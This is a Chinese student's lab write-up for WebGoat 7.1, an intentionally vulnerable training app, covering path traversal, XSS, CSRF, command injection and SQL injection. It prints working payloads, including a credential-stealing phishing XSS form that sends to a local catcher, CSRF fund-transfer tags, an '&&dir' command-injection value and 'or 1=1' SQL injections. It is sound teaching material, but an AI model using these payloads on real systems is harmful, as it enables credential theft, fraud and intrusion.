目录

  • Exp9 网络欺诈技术防范

    • 实验内容

      • Webgoat
      • General
      • Access Control Flaws
      • Crossing-Site Scripting
      • Injection Flaws
    • 知识点

Exp9 网络欺诈技术防范


实验内容

实验环境

  • 主机 Kali

实验工具

  • 平台 webgoat

Webgoat

webgoat下载安装

首先,下载地址:

https://s3.amazonaws.com/webgoat-war/webgoat-container-7.1-war-exec.jar

或者去github上也可以。

其次,cd切换到下载目录:

root@kali:~/下载# java -jar webgoat-container-7.1-war-exec.jar

注意,webgoat服务器占用本地8080端口,需要先把该端口腾出来。

然后,访问本地8080端口:

http://localhost:8080/WebGoat

选择账号登录后即可开始练习,本次实验要求完成10个练习。

  • 要开始刷Web漏洞了,好激动啊

General

Http Basics

看得出这题应该是用来熟悉题型的,user可以尝试hint,检查request参数,前端代码以及代理等,达到理解题目的目的。

  • 既来之,hint之
1.Type in your name and press 'go'
2.turn on Show Parameters or other features
3.Try to intercept the request with OWASP ZAP
4.Press the Show Lesson Plan button to view a lesson summary
5.Press the Show Solution button to view a lesson solution
  • 在Enter your Name的input中输点什么,harry吧,然后Go!
  • 表面Congratulations.input框中已经如题所示反转,变为了yrrah
  • f12打开源码,可以看到表单提交的后台函数#attack/1869022003/100与url显示的相同

  • 然后Show source把后台代码贴上来了,在createContent(Websession s)中
person = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
//获取前端Input值
person.reverse();
//反转
  • 之后就算入门了,正式开始做题

Access Control Flaws

Using an Access Control Matrix

  • emmm..浏览题意,本题设计了一个基于角色的权限控制,并且Only the [Admin] group should have access to the 'Account Manager' resource.,所以要求我们尝试获得Admin权限。
  • 粗略操作后发现,user表单中有4个用户,其中Shemp属于Admin组,允许访问Account Manager
  • 而后,可以发现Larry[User,Manager]被错误的赋予权限,以致于可以访问Account Manager
...
if (!getRoles(user).contains("Admin") && resource.equals("Account Manager")){makeSuccess(s);}s.setMessage("User " + user + " " + credentials + " was allowed to access resource " + resource);
//权限验证代码没有问题
...if (rl.contains(roles[1])){list.add(resources[1]);list.add(resources[5]);}//roles[1]即Larry,resources[5]即Account Manager,此处权限赋予出现错误
...

Bypass a Path Based Access Control Scheme

  • 本题要求我们尝试获得权限以访问list提供之外的文件,如WEB-INF/spring-security.xml

  • Hint中提示可利用相对路径访问
Current Directory is: /root/.extract/webapps/WebGoat/plugin_extracted/plugin/BasicAuthentication/lessonPlans/en
//在URL栏中输入可以打开文件目录,但只有BasicAuthentication.html一个文件
  • 利用BurpSuite打开代理,点击view之后拦截
File=BasicAuthentication.html&SUBMIT=View+File
  • 将File改为../main.jsp,forward即可在页面访问,

Crossing-Site Scripting

Phishing with XSS

  • 阅读题意,在Search框中插入一段包括获取信息的js脚本的HTML代码,将获取到的信息转发到本地servlet。

  • 前端脚本见知识点

  • 成功后在页面内插入了两个input

This feature requires account login:Enter Username:Enter Password:No results were found.
  • 输入了WebGoat的账号密码后,弹出一个alert
attack.?????? Your credentials were just stolen. User Name = webgoat Password = webgoat
//用户输入的账号信息已经被发给了本地服务器

Stored XSS Attacks

  • 简单浏览了一下,页面将会把提交的Message发布处来,因此可以提交一段带JS脚本的HTML文本。

  • 尝试一下
Title:
20155214
Message:
<script>alert("It is a simple stored XSS");</script>
  • 成功之后,在原本的位置
Message Contents For: 20155214
Title:  20155214
Message:
Posted by:  webgoat
//Message为空,点开之后出现alert弹窗

Reflected XSS Attacks

  • 阅读题意,还是在input中添加一个JS脚本,当页面执行HTML文本时执行。

  • 查看hint,利用以下代码可以查看cookie
<SCRIPT>alert(document.cookie);</SCRIPT>
  • 以下跨站脚本攻击通过调用ActiveXObject类,创建Xmlhttp对象
    ,可以将charge修改为商品总和
<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1){var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>
The total charged to your credit card:  $1997.96    

Cross Site Request Forgery(CSRF)

  • 阅读题意,我们通过输入一条,插入IMG的JS脚本,其URL地址指向attack的servlet

  • 在Message中,以下JS脚本插入了一张不存在的图片
<img src='attack?Screen=2078372&menu=900&transferFunds=5000'>
  • 运行成功后,F12查看源码,发现Message位置已经插入了该html文本,该url已经被执行。

CSRF Prompt By-Pass

  • 阅读题意,URL应该使用此CSRF-prompt-by-pass课程的屏幕,菜单参数和具有数字值(例如“5000”)的额外参数“transferFunds”来指向攻击小服务程序,以启动传输和字符串值“CONFIRM” 完成它。 您可以从右侧的插图复制课程参数,创建格式为“attack?Screen = XXX&menu = YYY&transferFunds = ZZZ”的网址。 谁收到这封电子邮件,恰好在当时被认证,将有资金转移。
<iframe src="attack?Screen=1471017872&menu=900&transferFunds=400"> </iframe>
<iframe src="attack?Screen=1471017872&menu=900&transferFunds=CONFIRM"> </iframe>
  • 成功之后,可以看到在页面上伪造了一个资金转换的交互界面。
Amount to transfer: 400
CONFIRM | CANCEL

Injection Flaws

Command Injection

  • 阅读题意,尝试向操作系统注入一个命令。

  • 打开Burp Suite,抓一下包
HelpFile
修改为
AccessControlMatrix.help"&&"dir

-点击Go,即可获得

<!-- Stop Instructions --><br>UserDatabase.mv.db           webgoat-container-7.1-exec.jar  ??  ??<br>VMwareTools-10.2.5-8068393.tar.gz  ??                 ??  ??<br>vmware-tools-distrib          ??                  ??  ??<br>Returncode: 0<br></pre></form></div>

Numeric SQL Injection

  • 阅读题意,要求我们修改页面上的SQL语句,来使服务器连接数据库输出所有天气信息

  • 正常情况下,SQL语句会按照station条件查询相关数据。

SELECT * FROM weather_data WHERE station = 101

  • 因此要求很简单,需要将数据库中的所有信息输出,删去条件即可

  • 打开Burp Suite,抓包会发现前端传输了station数据,因此我们将
station=101&SUBMIT=Go!
修改为
station=101 or 1=1&SUBMIT=Go!
  • 构成了新的SQL语句SELECT * FROM weather_data WHERE station = 101 or 1=1,即查询条件为永真,输出weather_data中的所有数据。

String SQL Injection

  • 阅读题意,手工设置SQL字符串注入,获得SMITH的信用卡信息

  • 注入字符串' or '1'='1,构成新SQL语句
ELECT * FROM user_data WHERE last_name = '' or '1'='1

即条件为永真,搜索user_data中所有数据。


知识点

  • XSS脚本
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div></div></div>
</form><script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} </script>
<form name="phish">
<br>
<br>
<HR><H2>This feature requires account login:</H2>
<br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass">
<br><input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

转载于:https://www.cnblogs.com/besti155214/p/9108703.html

2017-2018 Exp9 网络欺诈技术防范 20155214相关推荐

  1. 《网络攻防》网络欺诈技术防范

    20145224陈颢文 <网络攻防>网络欺诈技术防范 基础问题回答 通常在什么场景下容易受到DNS spoof攻击 公共场合的免费WiFi,如餐厅.图书馆等: 在日常生活工作中如何防范以上 ...

  2. 20145203盖泽双 《网络对抗技术》实践七:网络欺诈技术防范

    20145203盖泽双 <网络对抗技术>实践七:网络欺诈技术防范 1.实践目标 (1)简单应用SET工具建立冒名网站. (2)简单应用ettercap工具进行DNS spoof. (3)结 ...

  3. 20145209刘一阳 《网络对抗》Exp7 网络欺诈技术防范

    20145209刘一阳 <网络对抗>Exp7 网络欺诈技术防范 一.应用SET工具建立冒名网站 要让冒名网站在别的主机上也能看到,需要开启本机的Apache服务,并且要将Apache服务的 ...

  4. 20145202马超《网络对抗》Exp7 网络欺诈技术防范

    本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法.具体有(1)简单应用SET工具建立冒名网站(2)ettercap DNS spoof(3)结合应用两种技术,用DNS spo ...

  5. 20145212 罗天晨 网络欺诈技术防范

    一.实验问题 1.通常在什么场景下容易受到DNS spoof攻击 随便连接没有设置密码的wifi的情况下比较容易受攻击,因为这样就会连入局域网和该局域网中的各个主机都处于同一网段下了. 2.在日常生活 ...

  6. 20155308『网络对抗技术』Exp7:网络欺诈防范

    20155308『网络对抗技术』Exp7:网络欺诈防范 原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET ...

  7. 2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范

    2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范 实验目标 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法.具体实践有 (1)简单应用SET工 ...

  8. 2018-2019-2 20165235《网络对抗技术》Exp7 网络欺诈防范

    2018-2019-2 20165235<网络对抗技术>Exp7 网络欺诈防范 实验目的 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法 实验内容 (1)简单应 ...

  9. 2018-2019-2 网络对抗技术 20165314 Exp7 网络欺诈防范

    一.原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET工具建立冒名网站 (1分) ettercap DNS ...

最新文章

  1. rsync服务同步,linux日志,screen工具
  2. 两个不相同的类之间如果赋值
  3. OpenGL uniform变量赋值的三种方法
  4. 我的开源 GitBook: Python 之旅
  5. linux网络编程(四)线程池
  6. PE格式学习讨论群:3214720
  7. 一些著名的大公司面试题目-java
  8. Facebook主页照片和封面照片的尺寸要求
  9. Axure RP Extension for Chrome 安装插件
  10. 计算机毕业设计android的云南旅游,美食攻略,产品预订app(源码+系统+mysql数据库+Lw文档)
  11. C++结构体定义及申请空间
  12. D435i相机标定(不同标定方法总结)
  13. 统一信息管理平台服务器,4A统一安全管控平台
  14. 无人驾驶汽车感知综述
  15. js element-ui el-tree 树结构过滤 筛选
  16. 阿迪亚:中国北疆边境上的“草根卫士”
  17. python生成数独_数独生成与求解,Python实现
  18. pt100计算公式用c语言,PT100计算公式
  19. 程序员永远不要犯的错误
  20. Guriddo jqGrid的学习-入门

热门文章

  1. IPV6地址基础知识
  2. Objective-C学习篇03—继承
  3. 品牌数字化转型|借势营销节点,3 招解锁品牌营销力
  4. 自动化代码审查平台: 基于Docker Compose整合Jenkins + SonarQube
  5. sdn网络搭建以及负载均衡
  6. 在马克思手稿中有一道趣味的数学问题:一共有30个人,可能包括男人,女人和小孩。他们在一家饭馆吃饭共花了50先令,其中每个男人花3先令,每个女人花2先令,每个小孩花1先令。请问男人、女人和小孩各几人?
  7. (转)Linux——pv、vg和lv的概念
  8. 来自微信团队的 6 个开源项目
  9. 用卡尔曼滤波器跟踪导弹(量测更新频率与时间更新频率不相等)
  10. 继续:个人微信的自动收款解决(思路)